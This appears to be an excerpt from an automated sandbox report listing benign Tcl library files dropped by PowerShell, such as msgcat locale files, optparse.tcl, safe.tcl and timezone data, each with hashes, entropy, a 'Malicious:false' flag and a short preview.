                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset tr DAYS_OF_WEEK_ABBREV [list \.. "Paz"\.. "Pzt"\.. "Sal"\.. "\u00c7ar"\.. "Per"\.. "Cum"\.. "Cmt"].. ::msgcat::mcset tr DAYS_OF_WEEK_FULL [list \.. "Pazar"\.. "Pazartesi"\.. "Sal\u0131"\.. "\u00c7ar\u015famba"\.. "Per\u015fembe"\.. "Cuma"\.. "Cumartesi"].. ::msgcat::mcset tr MONTHS_ABBREV [list \.. "Oca"\.. "\u015eub"\.. "Mar"\.. "Nis"\.. "May"\.. "Haz"\.. "Tem"\.. "A\u011fu"\.. "Eyl"\.. "Eki"\.. "Kas"\.. "Ara"\.. ""].. ::msgcat::mcset tr MONTHS_FULL [list \.. "Ocak"\.. "\u015eubat"\.. "Mart"\.. "Nisan"\.. "May\u0131s"\.. "Haziran"\.. "Temmuz"\.. "A\u011fustos"\.. "Eyl\u00fcl"\.. "Ekim"\.. "Kas\u0131m"\.. "Aral\u
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2165
                                                                                                                                                                                                                      Entropy (8bit):4.289021158621493
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:436yILgoQjQPxUIkgPDRQnQ0vVQbC1iQwweIgWQDIoZI7QDI3QbI87IVQnIzQ7mh:2AzUe3EhV8CYgrbH7z3fLVTzgn5jyX7p
                                                                                                                                                                                                                      MD5:323BD95809A44B0BADC71AD36E5F095B
                                                                                                                                                                                                                      SHA1:44F6016873CA955D27545C56CCD24BDB06A83C43
                                                                                                                                                                                                                      SHA-256:7093DA7E39CEB6D3F51EB6CF1CCA2D7F3680ED7B8FE4A5F0CECEEF6BEB21AC77
                                                                                                                                                                                                                      SHA-512:DB16E0E2D17CE47673DE781A7171944C14CC550FB8EB0920C05B979E4D067E36DF0B59B8BFA81F82D8FCE1FFDDAAD2755E68BFE5BC0DBB11E8716A4D18BA5F7E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset uk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0432\u0442"\.. "\u0441\u0440"\.. "\u0447\u0442"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset uk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0456\u043b\u044f"\.. "\u043f\u043e\u043d\u0435\u0434\u0456\u043b\u043e\u043a"\.. "\u0432\u0456\u0432\u0442\u043e\u0440\u043e\u043a"\.. "\u0441\u0435\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440"\.. "\u043f'\u044f\u0442\u043d\u0438\u0446\u044f"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset uk MONTHS_ABBREV [list \.. "\u0441\u0456\u0447"\.. "\u043b\u044e\u0442"\.. "\u0431\u0435\u0440"\.. "\u043a\u0432\u0456\u0442"\.. "\u0442\u0440\u0430\u0432"\.. "\u0447\u0435\u0440\u0432"\.. "\u043b
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1471
                                                                                                                                                                                                                      Entropy (8bit):4.44729506678271
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR836DNjYTP55YAUy2tJ9kyzW68IFYHMBSW1K1pvhv1O:43dbYJyC8ySgI1dV1O
                                                                                                                                                                                                                      MD5:C127F54C462917D3B3EEF5F29F612138
                                                                                                                                                                                                                      SHA1:B1D9A67F856D93F98524C6372B352EA0DE1B9CD3
                                                                                                                                                                                                                      SHA-256:E9B7AECD456F1D2288604C982B5DED0DCF71DCA968C0B0EAFF4CA16CC3B73EC2
                                                                                                                                                                                                                      SHA-512:0B0F132F10580751258D37E070338C3B39DF57FDECDB9D0AFA67E90D6766DDCB4D711876E551ED759D177F1B8F4E9E1DD8F7899F7CB57F8039F55EC4C2984E87
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset vi DAYS_OF_WEEK_ABBREV [list \.. "Th 2"\.. "Th 3"\.. "Th 4"\.. "Th 5"\.. "Th 6"\.. "Th 7"\.. "CN"].. ::msgcat::mcset vi DAYS_OF_WEEK_FULL [list \.. "Th\u01b0\u0301 hai"\.. "Th\u01b0\u0301 ba"\.. "Th\u01b0\u0301 t\u01b0"\.. "Th\u01b0\u0301 n\u0103m"\.. "Th\u01b0\u0301 s\u00e1u"\.. "Th\u01b0\u0301 ba\u0309y"\.. "Chu\u0309 nh\u00e2\u0323t"].. ::msgcat::mcset vi MONTHS_ABBREV [list \.. "Thg 1"\.. "Thg 2"\.. "Thg 3"\.. "Thg 4"\.. "Thg 5"\.. "Thg 6"\.. "Thg 7"\.. "Thg 8"\.. "Thg 9"\.. "Thg 10"\.. "Thg 11"\.. "Thg 12"\.. ""].. ::msgcat::mcset vi MONTHS_FULL [list \.. "Th\u00e1ng m\u00f4\u0323t"\.. "Th\u00e1ng hai"\.. "Th\u00e1ng ba"\.. "Th\u00e1ng t\u01b0"\.. "Th\u00e
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1598), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3385
                                                                                                                                                                                                                      Entropy (8bit):4.5164095151631125
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:43qrY2BBT7uxDqwPqDa8c3FLbYmhyvMDKbW0YGLuoEyke2gdr:2yPTKdo
                                                                                                                                                                                                                      MD5:2F356DE14D48B1091DEAA32D20C38D96
                                                                                                                                                                                                                      SHA1:4AB78D47A73290000955A7C1DFDF7106093F69FD
                                                                                                                                                                                                                      SHA-256:EB247F5184A59414D3DF7E3ECA51F5998C248CFB27D2C02E62A7A30AB35197A7
                                                                                                                                                                                                                      SHA-512:602410830018B455C68AE2EBDD83BA561CF59DA5898E00C80CE7EF619912E591EB38B4C8FE8D9B1F024E7105B0C4D2D326FC855F31E79C1B954429B947DFFBB1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh DAYS_OF_WEEK_ABBREV [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh DAYS_OF_WEEK_FULL [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh MONTHS_ABBREV [list \.. "\u4e00\u6708"\.. "\u4e8c\u6708"\.. "\u4e09\u6708"\.. "\u56db\u6708"\.. "\u4e94\u6708"\.. "\u516d\u6708"\.. "\u4e03\u6708"\.. "\u516b\u6708"\.. "\u4e5d\u6708"\.. "\u5341\u6708"\.. "\u5341\u4e00\u6708"\.. "\u5341\u4e8c\u6708"\.. ""].. ::msgcat::m
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):319
                                                                                                                                                                                                                      Entropy (8bit):5.167825099880243
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoX5YBoHJ+3vtfNrsoHJ+3v6MYBoXa+3vYq9vn:4EnLB383U5YMJ+3vtN3J+3v6LcL3vYqN
                                                                                                                                                                                                                      MD5:9FCDC2E80E13984D434E3CC91E1ED14C
                                                                                                                                                                                                                      SHA1:710D9EE2A71021F4AB609886138EED43C1380ACD
                                                                                                                                                                                                                      SHA-256:4C8A855700FEFE8EE21B08030FF4159D8011AE50353F063229C42DE6292475CF
                                                                                                                                                                                                                      SHA-512:D899A1F58DF1051BB2C2C4AC859C52A2D19B1593C37022A29439B37A8057ADC3941F3564E2E1D9CEB72AE123A4E12E24C3736343AA3A5EC8749AB5AEBBF65085
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_CN DATE_FORMAT "%Y-%m-%e".. ::msgcat::mcset zh_CN TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset zh_CN TIME_FORMAT_12 "%P%I\u65f6%M\u5206%S\u79d2".. ::msgcat::mcset zh_CN DATE_TIME_FORMAT "%Y-%m-%e %k:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):780
                                                                                                                                                                                                                      Entropy (8bit):4.716025632367214
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:4EnLB383HmSBBHZovDh4ToC4qU3WwVW3v6P3v3WwSn:4aR83Hxo14u3Ww+viv3WwS
                                                                                                                                                                                                                      MD5:CFDA7B6463305FA15DBBA72D725A1876
                                                                                                                                                                                                                      SHA1:2BF885073FBAF4A38B7AFDA76CA391F195A5A362
                                                                                                                                                                                                                      SHA-256:7E1C5BD9EC1A17BB851B0DCABD0DFA9FF9D64B89603D9D3FBEAAC609172346AE
                                                                                                                                                                                                                      SHA-512:55F974C706933ECE0575A33C381D9B370B8A408C5C5514C805EC04C8B0CA5BAFAA47267DA98E1805B478A9589FFB7549D79002B2A7AF387049011D78DD7605B6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_HK DAYS_OF_WEEK_ABBREV [list \.. "\u65e5"\.. "\u4e00"\.. "\u4e8c"\.. "\u4e09"\.. "\u56db"\.. "\u4e94"\.. "\u516d"].. ::msgcat::mcset zh_HK MONTHS_ABBREV [list \.. "1\u6708"\.. "2\u6708"\.. "3\u6708"\.. "4\u6708"\.. "5\u6708"\.. "6\u6708"\.. "7\u6708"\.. "8\u6708"\.. "9\u6708"\.. "10\u6708"\.. "11\u6708"\.. "12\u6708"\.. ""].. ::msgcat::mcset zh_HK DATE_FORMAT "%Y\u5e74%m\u6708%e\u65e5".. ::msgcat::mcset zh_HK TIME_FORMAT_12 "%P%I:%M:%S".. ::msgcat::mcset zh_HK DATE_TIME_FORMAT "%Y\u5e74%m\u6708%e\u65e5 %P%I:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):347
                                                                                                                                                                                                                      Entropy (8bit):5.062880051437783
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoOpEoPpFocMohX3v6Zwoh+3v6fxvn:4EnLB383J53v6O3vCn
                                                                                                                                                                                                                      MD5:3218F8E6BEDD534277DE0849C423158E
                                                                                                                                                                                                                      SHA1:10C006446A10406A5644C4033665E877EBF72AF7
                                                                                                                                                                                                                      SHA-256:500546B3211D454659D845B4AB9AEF226125100DF40407C49530DE17CDD4363F
                                                                                                                                                                                                                      SHA-512:3142893DA85BA8F83A5B6851B313B5F5FF80D2B989C1AE015665EE70373249B44EFB4FF7C621F1D8F37AC6019EF5E8D6D21C76C48998C3D9072F9C5060AA8813
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_SG AM "\u4e0a\u5348".. ::msgcat::mcset zh_SG PM "\u4e2d\u5348".. ::msgcat::mcset zh_SG DATE_FORMAT "%d %B %Y".. ::msgcat::mcset zh_SG TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_SG DATE_TIME_FORMAT "%d %B %Y %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):354
                                                                                                                                                                                                                      Entropy (8bit):5.124064818715749
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoAykaRULH/XRxy/5oAyjZRULHi5oAyU/G0OMoAyxW3v6ZQ:4EnLB38315xDOiKRRW3v6F3v8A2n
                                                                                                                                                                                                                      MD5:9010E34791B5DDB7F1E0AD4DA6BD4623
                                                                                                                                                                                                                      SHA1:418F7374BABEF27FEC8E00D3A32F535084593AB9
                                                                                                                                                                                                                      SHA-256:DBA0584B8E1925B439F06E0BF0965E97AFB7EB39E70E0E4C9B70769EBC5F996C
                                                                                                                                                                                                                      SHA-512:D3AB698B725E84DAB06E472C41FF2EB55D63885D22B4598C596800BAC83A02A44CB524524F267D090952AF7E0031F47720786ACF9E354EF672CF9EEFB7DB3BD4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_TW BCE "\u6c11\u570b\u524d".. ::msgcat::mcset zh_TW CE "\u6c11\u570b".. ::msgcat::mcset zh_TW DATE_FORMAT "%Y/%m/%e".. ::msgcat::mcset zh_TW TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_TW DATE_TIME_FORMAT "%Y/%m/%e %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):33777
                                                                                                                                                                                                                      Entropy (8bit):4.60013086740989
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:4D0xrpIuhenN4kA0G6sRcl5AdtsPLKiF64aJQ2L:HpnhsS9C5Adqua5aJvL
                                                                                                                                                                                                                      MD5:4ECD97188BFED58A15FE22EC566FA6A3
                                                                                                                                                                                                                      SHA1:6E4E91096298F1A0AE6CD4241F167C8B4F661EE5
                                                                                                                                                                                                                      SHA-256:67A157F1873D606B53DC4D894BD8E71F6B1A0DD66177B9513BD039B348B40349
                                                                                                                                                                                                                      SHA-512:1D5067BBB13DAB001168EEB41EBFA2D13BACB0F43A8067CC93923E8F4D062AA387DA23D7D98D6A2AE77D7C849A6026F2343102CBE03690C2CEA0890222339475
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# optparse.tcl --..#..# (private) Option parsing package..# Primarily used internally by the safe:: code...#..#.WARNING: This code will go away in a future release..#.of Tcl. It is NOT supported and you should not rely..#.on it. If your code does rely on this package you..#.may directly incorporate this code into your application.....package require Tcl 8.5-..# When this version number changes, update the pkgIndex.tcl file..# and the install directory in the Makefiles...package provide opt 0.4.8....namespace eval ::tcl {.... # Exported APIs.. namespace export OptKeyRegister OptKeyDelete OptKeyError OptKeyParse \.. OptProc OptProcArgGiven OptParse \... Lempty Lget \.. Lassign Lvarpop Lvarpop1 Lvarset Lvarincr \.. SetMax SetMin......################# Example of use / 'user documentation' ###################.... proc OptCreateTestProc {} {.....# Defines ::tcl::OptParseTest as a test proc with parsed arguments...# (can't be d
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):620
                                                                                                                                                                                                                      Entropy (8bit):4.702477618616754
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:jHxIRu9zhjJS42wbGlTULuUAZb3KykszLYIGbyAkXaqrQ+pBb6:biRUJS42wbGlTUcZ+yk2LY0XaqrB4
                                                                                                                                                                                                                      MD5:07532085501876DCC6882567E014944C
                                                                                                                                                                                                                      SHA1:6BC7A122429373EB8F039B413AD81C408A96CB80
                                                                                                                                                                                                                      SHA-256:6A4ABD2C519A745325C26FB23BE7BBF95252D653A24806EB37FD4AA6A6479AFE
                                                                                                                                                                                                                      SHA-512:0D604E862F3A1A19833EAD99AAF15A9F142178029AB64C71D193CEE4901A0196C1EEDDC2BCE715B7FA958AC45C194E63C77A71E4BE4F9AEDFD5B44CF2A726E76
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Tcl package index file, version 1.1..# This file is generated by the "pkg_mkIndex -direct" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....if {![package vsatisfies [package provide Tcl] 8.5-]} {return}..package ifneeded opt 0.4.8 [list source [file join $dir optparse.tcl]]..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):23995
                                                                                                                                                                                                                      Entropy (8bit):4.884828325514459
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:8xgjLNILEHsdAW2UfnImRqXqux6XmihmCchzPLrXJjJh6PLfzdklG:8xgjLNImsdnvIm86uGLhLchzDzJ9h6Dn
                                                                                                                                                                                                                      MD5:DDB0AB9842B64114138A8C83C4322027
                                                                                                                                                                                                                      SHA1:ECCACDC2CCD86A452B21F3CF0933FD41125DE790
                                                                                                                                                                                                                      SHA-256:F46AB61CDEBE3AA45FA7E61A48930D64A0D0E7E94D04D6BF244F48C36CAFE948
                                                                                                                                                                                                                      SHA-512:C0CF718258B4D59675C088551060B34CE2BC8638958722583AC2313DC354223BFEF793B02F1316E522A14C7BA9BED219531D505DE94DC3C417FC99D216A01463
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# package.tcl --..#..# utility procs formerly in init.tcl which can be loaded on demand..# for package management...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval tcl::Pkg {}....# ::tcl::Pkg::CompareExtension --..#..# Used internally by pkg_mkIndex to compare the extension of a file to a given..# extension. On Windows, it uses a case-insensitive comparison because the..# file system can be file insensitive...#..# Arguments:..# fileName.name of a file whose extension is compared..# ext..(optional) The extension to compare against; you must..#..provide the starting dot...#..Defaults to [info sharedlibextension]..#..# Results:..# Returns 1 if the extension matches, 0 otherwise....proc tcl::Pkg::CompareExtension {fileName {ext {}}} {.. global tcl_platfor
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):844
                                                                                                                                                                                                                      Entropy (8bit):4.883013702569192
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:TF7S2n2wn2SNHaeYF9xcwrmXhbs1GUiSYX3EtSK78ex4VIpynEw88/McUBbPgnz:TF7Hn2wnlk2KwyZSM4SkV/3UB7Cz
                                                                                                                                                                                                                      MD5:577787C2F4F5956BA70F83012B980AE5
                                                                                                                                                                                                                      SHA1:040B2469F796F3FDFCD1E1DD2EB1C5B799EDEF62
                                                                                                                                                                                                                      SHA-256:E269029C8263E3CBC1920C3604ECDCF15EDCCB208A0D68F9EB42B73954D620C0
                                                                                                                                                                                                                      SHA-512:C2940F6F3D77412EFC537B8AB67352F519DFFA95739FCC17BF1817335AFD9E5BFE91ABE98CBA99E278CB4923D4E6D431ED9D72282745203C0F7D73193F550238
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# parray:..# Print the contents of a global array on stdout...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc parray {a {pattern *}} {.. upvar 1 $a array.. if {![array exists array]} {...return -code error "\"$a\" isn't an array".. }.. set maxl 0.. set names [lsort [array names array $pattern]].. foreach name $names {...if {[string length $name] > $maxl} {... set maxl [string length $name]...}.. }.. set maxl [expr {$maxl + [string length $a] + 2}].. foreach name $names {...set nameString [format %s(%s) $a $name]...puts stdout [format "%-*s = %s" $maxl $nameString $array($name)].. }..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):42223
                                                                                                                                                                                                                      Entropy (8bit):4.822635446297551
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:H/Jo8y7AyARYhZfc3njlVdRIp4xOtoYx4WneNiBq5vIhfwEaqadlUCJ2Pbb1P6:H/c7AmhZmnjvdRIG924WneNiBq5+fwEc
                                                                                                                                                                                                                      MD5:B8C1561D471CFBF4111C706411D59883
                                                                                                                                                                                                                      SHA1:71483EAEEF377EE9AF90BEC44F70C7B12C5BC720
                                                                                                                                                                                                                      SHA-256:C21DCE3AB31893118BBED01E559070F1D3541877FEE331BD45F5BF4300ED9654
                                                                                                                                                                                                                      SHA-512:465065A938C71AF4588B3331B51A62DD57F57492EB1CB6C0F52B9FD0A2FE7A54B1E995AA56E4A41D7A99EAFF665C1E23E3B240FB3F9840AB242C21B1DBFFFF45
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# safe.tcl --..#..# This file provide a safe loading/sourcing mechanism for safe interpreters...# It implements a virtual path mechanism to hide the real pathnames from the..# child. It runs in a parent interpreter and sets up data structure and..# aliases that will be invoked when used from a child interpreter...#..# See the safe.n man page for details...#..# Copyright (c) 1996-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....#..# The implementation is based on namespaces. These naming conventions are..# followed:..# Private procs starts with uppercase...# Public procs are exported and starts with lowercase..#....# Needed utilities package..package require opt 0.4.8....# Create the safe namespace..namespace eval ::safe {.. # Exported API:.. namespace export interpCreate interpInit interpConfigure interpDelete \...interpAddToAccessPath interpFindInAccessPath setL
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5617
                                                                                                                                                                                                                      Entropy (8bit):4.747404679682368
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:eOaVhNUMUuUQU2UsUIUbUEUEeUkgU6UWSO0DT5RTdcvsilrvs+jscMK57ehXowrz:ejVHRRLP3LWDXewTbSO0DT5RTdcvsilg
                                                                                                                                                                                                                      MD5:C62FB22F4C9A3EFF286C18421397AAF4
                                                                                                                                                                                                                      SHA1:4A49B8768CFF68F2EFFAF21264343B7C632A51B2
                                                                                                                                                                                                                      SHA-256:DDF7E42DEF37888AD0A564AA4F8CA95F4EEC942CEBEBFCA851D35515104D5C89
                                                                                                                                                                                                                      SHA-512:558D401CB6AF8CE3641AF55CAEBC9C5005AB843EE84F60C6D55AFBBC7F7129DA9C58C2F55C887C3159107546FA6BC13FFC4CCA63EA8841D7160B8AA99161A185
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Tcl autoload index file, version 2.0..# -*- tcl -*-..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(auto_reset) [list source [file join $dir auto.tcl]]..set auto_index(tcl_findLibrary) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex_old) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::init) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::cleanup) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::mkindex) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::hook) [list source [file join $dir auto.t
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12204
                                                                                                                                                                                                                      Entropy (8bit):4.763796758810551
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:55CjnlRfMKqaOH5bE2KjNkkpgpCmqkkuowUh9PTYMsvSO+xy8h/vuKisM68E:5q3MKYH5bE1jNkkpgomq/uCPTYMC+k83
                                                                                                                                                                                                                      MD5:215262A286E7F0A14F22DB1AA7875F05
                                                                                                                                                                                                                      SHA1:66B942BA6D3120EF8D5840FCDEB06242A47491FF
                                                                                                                                                                                                                      SHA-256:4B7ED9FD2363D6876092DB3F720CBDDF97E72B86B519403539BA96E1C815ED8F
                                                                                                                                                                                                                      SHA-512:6ECD745D7DA9D826240C0AB59023C703C94B158AE48C1410FAA961A8EDB512976A4F15AE8DEF099B58719ADF0D2A9C37E6F29F54D39C1AB7EE81FA333A60F39B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- tcl -*-..#..# Searching for Tcl Modules. Defines a procedure, declares it as the primary..# command for finding packages, however also uses the former 'package unknown'..# command as a fallback...#..# Locates all possible packages in a directory via a less restricted glob. The..# targeted directory is derived from the name of the requested package, i.e...# the TM scan will look only at directories which can contain the requested..# package. It will register all packages it found in the directory so that..# future requests have a higher chance of being fulfilled by the ifneeded..# database without having to come to us again...#..# We do not remember where we have been and simply rescan targeted directories..# when invoked again. The reasoning is this:..#..# - The only way we get back to the same directory is if someone is trying to..# [package require] something that wasn't there on the first scan...#..# Either..# 1) It is there now: If we rescan, you get it; if not you don
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):147
                                                                                                                                                                                                                      Entropy (8bit):4.995501022397479
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QF08x/2DcsBdNMXGm2OHnFvpsYoHsdSalHFLwy:SlSWB9eg/2DBpDm2OHnFvmYoH1alHOy
                                                                                                                                                                                                                      MD5:FF8B5540631A6EE93507338C4E7AA49D
                                                                                                                                                                                                                      SHA1:817B261A1B6B92AA498EC286349964EA10FB5A84
                                                                                                                                                                                                                      SHA-256:7213997BB9CF9D384A7002B8C8EFEF25C01ABA6083D9835A16D583D5DCEE40A0
                                                                                                                                                                                                                      SHA-512:8D78AC4868ED0013EDA536C0E82E0E91398772AA18C637AEFE22F24B142FCDA55A4CB853B2282951E907C9E2F62BD3F831A5CF995F52898F5225D16889943A9C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Abidjan) {.. {-9223372036854775808 -968 0 LMT}.. {-1830383032 0 0 GMT}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):183
                                                                                                                                                                                                                      Entropy (8bit):4.832432925672155
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dc9XfBQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DUGDBS
                                                                                                                                                                                                                      MD5:52FDFD3DB98475FBBB620D0D5565C5CC
                                                                                                                                                                                                                      SHA1:C7750452859663605272553DBEE0B6C134E1517C
